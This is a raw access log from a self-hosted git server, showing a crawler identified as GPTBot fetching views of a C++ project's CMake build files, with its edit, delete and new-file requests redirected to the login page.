"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20503] [Gzip 16.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10301] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:47:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 933] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 933] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21556] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:18:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11405] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:18:47:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:18:47:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:18:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15496] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:18:47:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:18:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11433] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11277] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11322] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:18:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31936] [Gzip 10.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9855] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10370] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10145] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:48:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11300] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:48:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9858] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:48:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11302] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:48:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:48:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:48:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:48:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:48:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:18:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 945] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 